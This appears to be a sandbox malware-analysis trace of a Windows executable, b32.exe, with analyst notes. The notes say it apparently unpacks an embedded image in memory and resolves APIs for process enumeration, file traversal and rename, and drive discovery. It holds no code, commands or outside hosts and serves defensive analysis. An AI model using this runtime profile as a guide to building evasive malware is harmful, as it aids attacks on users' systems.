Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WaitForThreadpoolTimerCallbacks, address_out = 0x77e9c50e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CloseThreadpoolTimer, address_out = 0x77e9c381 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateThreadpoolWait, address_out = 0x75fff088 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetThreadpoolWait, address_out = 0x77e805d7 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CloseThreadpoolWait, address_out = 0x77e9ca24 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlushProcessWriteBuffers, address_out = 0x77e50b8c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FreeLibraryWhenCallbackReturns, address_out = 0x77f0fde8 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentProcessorNumber, address_out = 0x77ea1e1d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetLogicalProcessorInformation, address_out = 0x76064761 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateSymbolicLinkW, address_out = 0x7605cd11 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetDefaultDllDirectories, address_out = 0x0 False 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EnumSystemLocalesEx, address_out = 0x7606424f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CompareStringEx, address_out = 0x760646b1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetDateFormatEx, address_out = 0x76076676 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetLocaleInfoEx, address_out = 0x76064751 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetTimeFormatEx, address_out = 0x760765f1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetUserDefaultLocaleName, address_out = 0x760647c1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsValidLocaleName, address_out = 0x760647e1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LCMapStringEx, address_out = 0x760647f1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentPackageId, address_out = 0x0 False 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetTickCount64, address_out = 0x75ffeee0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetFileInformationByHandleExW, address_out = 0x0 False 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetFileInformationByHandleW, address_out = 0x0 False 1
Fn
File Open filename = STD_INPUT_HANDLE True 1
Fn
File Get Info filename = STD_INPUT_HANDLE, type = file_type False 1
Fn
File Open filename = STD_OUTPUT_HANDLE True 1
Fn
File Get Info filename = STD_OUTPUT_HANDLE, type = file_type False 1
Fn
File Open filename = STD_ERROR_HANDLE True 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
Environment Get Environment String - True 1
Fn
Data
Module Get Filename process_name = c:\users\5p5nrg~1\appdata\local\temp\b32.exe, file_name_orig = C:\Users\5P5NRG~1\AppData\Local\Temp\b32.exe, size = 260 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LoadLibraryA, address_out = 0x75fe49d7 True 1
Fn
Module Load module_name = kernel32.dll, base_address = 0x75fd0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualAlloc, address_out = 0x75fe1856 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualProtect, address_out = 0x75fe435f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualFree, address_out = 0x75fe186e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetVersionExA, address_out = 0x75fe3519 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TerminateProcess, address_out = 0x75ffd802 True 1
Fn
System Get Info type = Operating System True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x75fd0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentProcess, address_out = 0x75fe1809 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WaitForSingleObject, address_out = 0x75fe1136 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = OpenProcess, address_out = 0x75fe1986 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = Sleep, address_out = 0x75fe10ff True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleFileNameW, address_out = 0x75fe4950 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateFileW, address_out = 0x75fe3f5c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = ExitThread, address_out = 0x77e8d598 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetLastError, address_out = 0x75fe11c0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetProcAddress, address_out = 0x75fe1222 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = ExitProcess, address_out = 0x75fe7a10 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleHandleA, address_out = 0x75fe1245 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CloseHandle, address_out = 0x75fe1410 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentProcessId, address_out = 0x75fe11f8 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetVersionExW, address_out = 0x75fe1ae5 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LoadLibraryA, address_out = 0x75fe49d7 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrlenW, address_out = 0x75fe1700 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TerminateThread, address_out = 0x75fe7a2f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateThread, address_out = 0x75fe34d5 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WriteConsoleW, address_out = 0x76007aca True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetFilePointerEx, address_out = 0x75ffc807 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualProtect, address_out = 0x75fe435f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsWow64Process, address_out = 0x75fe195e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetStdHandle, address_out = 0x7606454f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetConsoleMode, address_out = 0x75fe1328 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetConsoleCP, address_out = 0x76087bff True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlushFileBuffers, address_out = 0x75fe469b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCommandLineA, address_out = 0x75fe51a1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetLastError, address_out = 0x75fe11a9 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentThreadId, address_out = 0x75fe1450 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x77e70fcb True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = DecodePointer, address_out = 0x77e69d35 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleHandleExW, address_out = 0x75fe4a6f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = MultiByteToWideChar, address_out = 0x75fe192e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WideCharToMultiByte, address_out = 0x75fe170d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetProcessHeap, address_out = 0x75fe14e9 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetStdHandle, address_out = 0x75fe51b3 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetFileType, address_out = 0x75fe3531 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = DeleteCriticalSection, address_out = 0x77e645f5 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetStartupInfoW, address_out = 0x75fe4d40 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleFileNameA, address_out = 0x75fe14b1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WriteFile, address_out = 0x75fe1282 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = QueryPerformanceCounter, address_out = 0x75fe1725 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetSystemTimeAsFileTime, address_out = 0x75fe3509 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetEnvironmentStringsW, address_out = 0x75fe51e3 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FreeEnvironmentStringsW, address_out = 0x75fe51cb True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsDebuggerPresent, address_out = 0x75fe4a5d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsProcessorFeaturePresent, address_out = 0x75fe5235 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = UnhandledExceptionFilter, address_out = 0x7600772f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetUnhandledExceptionFilter, address_out = 0x75fe87c9 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = InitializeCriticalSectionAndSpinCount, address_out = 0x75fe1916 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TerminateProcess, address_out = 0x75ffd802 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TlsAlloc, address_out = 0x75fe49ad True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TlsGetValue, address_out = 0x75fe11e0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TlsSetValue, address_out = 0x75fe14fb True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TlsFree, address_out = 0x75fe3587 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleHandleW, address_out = 0x75fe34b0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EnterCriticalSection, address_out = 0x77e522b0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LeaveCriticalSection, address_out = 0x77e52270 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapFree, address_out = 0x75fe14c9 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsValidCodePage, address_out = 0x75fe4493 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetACP, address_out = 0x75fe179c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetOEMCP, address_out = 0x7600d1a1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCPInfo, address_out = 0x75fe5189 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LoadLibraryExW, address_out = 0x75fe495d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = OutputDebugStringW, address_out = 0x7600d1d4 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapAlloc, address_out = 0x77e5e026 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapReAlloc, address_out = 0x77e71f6e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetStringTypeW, address_out = 0x75fe1946 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapSize, address_out = 0x77e63002 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LCMapStringW, address_out = 0x75fe17b9 True 1
Fn
Module Load module_name = USER32.dll, base_address = 0x763e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = SetFocus, address_out = 0x76402175 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = SendMessageW, address_out = 0x763f9679 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = CharUpperBuffW, address_out = 0x763ffc5d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = GetForegroundWindow, address_out = 0x76402320 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = GetSystemMetrics, address_out = 0x763f7d2f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = GetMessageW, address_out = 0x763f78e2 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = TranslateMessage, address_out = 0x763f7809 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = DispatchMessageW, address_out = 0x763f787b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = SetForegroundWindow, address_out = 0x7641f170 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = DefWindowProcW, address_out = 0x77e625dd True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = RegisterClassExW, address_out = 0x763fb17d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = CreateWindowExW, address_out = 0x763f8a29 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = DestroyWindow, address_out = 0x763f9a55 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = ShowWindow, address_out = 0x76400dfb True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = keybd_event, address_out = 0x764502bf True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = UpdateWindow, address_out = 0x76403559 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = SetWindowTextW, address_out = 0x764020ec True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = GetWindowLongW, address_out = 0x763f6ffe True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = SetWindowLongW, address_out = 0x763f8332 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = SystemParametersInfoW, address_out = 0x763f90d3 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = GetAncestor, address_out = 0x763f9785 True 1
Fn
Module Load module_name = ntdll.dll, base_address = 0x77e30000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ntdll.dll, function = RtlUnwind, address_out = 0x77e76d39 True 1
Fn
Module Load module_name = msvcr100.dll, base_address = 0x71060000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\msvcr100.dll, function = atexit, address_out = 0x7107c544 True 1
Fn
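[Note: the startup sequence that opened this thread (system time query, the FlsAlloc… probe, the STD_*_HANDLE checks, the environment-string read) repeats from here. In between, the log shows lookups of LoadLibraryA, VirtualAlloc, VirtualProtect and VirtualFree, followed by a full import resolution for KERNEL32, USER32, ntdll and msvcr100. A second runtime initialisation inside the same b32.exe process is consistent with a packed sample unpacking and starting an embedded image in memory. That is an inference from the call order, not something the log states.]
System Get Time type = System Time, time = 2018-05-11 13:20:42 (UTC) True 1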
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x75fd0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsAlloc, address_out = 0x75fe4f2b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsFree, address_out = 0x75fe359f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsGetValue, address_out = 0x75fe1252 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsSetValue, address_out = 0x75fe4208 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = InitializeCriticalSectionEx, address_out = 0x75fe4d28 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateEventExW, address_out = 0x7606410b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateSemaphoreExW, address_out = 0x76064195 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetThreadStackGuarantee, address_out = 0x75fed31f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateThreadpoolTimer, address_out = 0x75ffee7e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetThreadpoolTimer, address_out = 0x77e7441c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WaitForThreadpoolTimerCallbacks, address_out = 0x77e9c50e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CloseThreadpoolTimer, address_out = 0x77e9c381 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateThreadpoolWait, address_out = 0x75fff088 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetThreadpoolWait, address_out = 0x77e805d7 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CloseThreadpoolWait, address_out = 0x77e9ca24 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlushProcessWriteBuffers, address_out = 0x77e50b8c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FreeLibraryWhenCallbackReturns, address_out = 0x77f0fde8 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentProcessorNumber, address_out = 0x77ea1e1d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetLogicalProcessorInformation, address_out = 0x76064761 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateSymbolicLinkW, address_out = 0x7605cd11 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetDefaultDllDirectories, address_out = 0x0 False 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EnumSystemLocalesEx, address_out = 0x7606424f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CompareStringEx, address_out = 0x760646b1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetDateFormatEx, address_out = 0x76076676 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetLocaleInfoEx, address_out = 0x76064751 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetTimeFormatEx, address_out = 0x760765f1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetUserDefaultLocaleName, address_out = 0x760647c1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsValidLocaleName, address_out = 0x760647e1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LCMapStringEx, address_out = 0x760647f1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentPackageId, address_out = 0x0 False 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetTickCount64, address_out = 0x75ffeee0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetFileInformationByHandleExW, address_out = 0x0 False 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetFileInformationByHandleW, address_out = 0x0 False 1
Fn
File Open filename = STD_INPUT_HANDLE True 1
Fn
File Get Info filename = STD_INPUT_HANDLE, type = file_type False 1
Fn
File Open filename = STD_OUTPUT_HANDLE True 1
Fn
File Get Info filename = STD_OUTPUT_HANDLE, type = file_type False 1
Fn
File Open filename = STD_ERROR_HANDLE True 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
Environment Get Environment String - True 1
Fn
Data
Module Get Filename process_name = c:\users\5p5nrg~1\appdata\local\temp\b32.exe, file_name_orig = C:\Users\5P5NRG~1\AppData\Local\Temp\b32.exe, size = 260 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrg~1\appdata\local\temp\b32.exe, file_name_orig = C:\Users\5P5NRG~1\AppData\Local\Temp\b32.exe, size = 256 True 2
Fn
System Sleep duration = 200 milliseconds (0.200 seconds) True 1
Fn
Module Get Handle module_name = c:\users\5p5nrg~1\appdata\local\temp\b32.exe, base_address = 0x400000 True 1
Fn
Module Load module_name = USER32.dll, base_address = 0x763e0000 True 1
Fn
System Get Info type = Operating System True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\ntdll.dll, base_address = 0x77e30000 True 1
Fn
Window Create wndproc_parameter = 0 True 1
Fn
Module Load module_name = USER32.dll, base_address = 0x763e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = IsMenu, address_out = 0x76405cb1 True 1
Fn
Window Set Attribute index = 0, new_long = 825373492 False 1
Fn
Window Create class_name = ExtraWnd1, wndproc_parameter = 0 True 1
Fn
Window Create class_name = ExtraWnd2, wndproc_parameter = 0 True 1
Fn
System Sleep duration = 100 milliseconds (0.100 seconds) True 5
Fn
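[Note: the lookups that follow include process enumeration (CreateToolhelp32Snapshot, Process32FirstW, Process32NextW), directory traversal and rename (FindFirstFileW, FindNextFileW, MoveFileW, SetFileAttributesW), drive and volume discovery (GetDriveTypeW, GetVolumeInformationW) and file mapping (CreateFileMappingW, MapViewOfFile). A resolved address shows only that the API is available to the code, not that it was called. Correlate with the File and Process operations elsewhere in the report before drawing behavioural conclusions.]
Module Load module_name = KERNEL32.dll, base_address = 0x75fd0000 True 1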
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = Sleep, address_out = 0x75fe10ff True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TerminateProcess, address_out = 0x75ffd802 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VerifyVersionInfoW, address_out = 0x75ffd423 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WaitForMultipleObjects, address_out = 0x75fe4220 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = DeleteCriticalSection, address_out = 0x77e645f5 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LocalFree, address_out = 0x75fe2d3c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = ExpandEnvironmentStringsW, address_out = 0x75fe4173 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateProcessW, address_out = 0x75fe103d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetHandleInformation, address_out = 0x75ff195c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrcatA, address_out = 0x76002b7a True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = MultiByteToWideChar, address_out = 0x75fe192e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreatePipe, address_out = 0x7606415b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = Process32FirstW, address_out = 0x76008baf True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = Process32NextW, address_out = 0x7600896c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateToolhelp32Snapshot, address_out = 0x7600735f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LeaveCriticalSection, address_out = 0x77e52270 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CloseHandle, address_out = 0x75fe1410 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FindFirstFileW, address_out = 0x75fe4435 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetFileAttributesW, address_out = 0x75fe1b18 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrcmpW, address_out = 0x75fe5929 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = MoveFileW, address_out = 0x75ff9af0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FindClose, address_out = 0x75fe4442 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FindNextFileW, address_out = 0x75fe54ee True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetFileAttributesW, address_out = 0x75ffd4f7 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetNativeSystemInfo, address_out = 0x75ff10b5 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetComputerNameW, address_out = 0x75fedd0e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TerminateThread, address_out = 0x75fe7a2f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetWindowsDirectoryW, address_out = 0x75fe43e2 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetVolumeInformationW, address_out = 0x75ffc860 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LoadLibraryA, address_out = 0x75fe49d7 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetSystemDirectoryW, address_out = 0x75fe5063 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = OpenProcess, address_out = 0x75fe1986 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = InitializeCriticalSection, address_out = 0x77e62c42 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WaitForSingleObject, address_out = 0x75fe1136 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VerSetConditionMask, address_out = 0x77ea92b9 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetDriveTypeW, address_out = 0x75fe418b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrcatW, address_out = 0x7600828e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsProcessorFeaturePresent, address_out = 0x75fe5235 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrcmpiW, address_out = 0x75ffd5cd True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateFileMappingW, address_out = 0x75fe1909 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrlenW, address_out = 0x75fe1700 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = ExitThread, address_out = 0x77e8d598 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateFileW, address_out = 0x75fe3f5c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleFileNameW, address_out = 0x75fe4950 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WriteFile, address_out = 0x75fe1282 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleHandleW, address_out = 0x75fe34b0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = UnmapViewOfFile, address_out = 0x75fe1826 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = MapViewOfFile, address_out = 0x75fe18f1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetFileSize, address_out = 0x75fe196e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetEnvironmentVariableW, address_out = 0x75fe1b48 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrcpyA, address_out = 0x76002a9d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleHandleA, address_out = 0x75fe1245 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualAlloc, address_out = 0x75fe1856 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetProcAddress, address_out = 0x75fe1222 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetProcessHeap, address_out = 0x75fe14e9 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapFree, address_out = 0x75fe14c9 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateMutexW, address_out = 0x75fe424c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrcpyW, address_out = 0x76003102 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetLastError, address_out = 0x75fe11c0 True 1
Fn
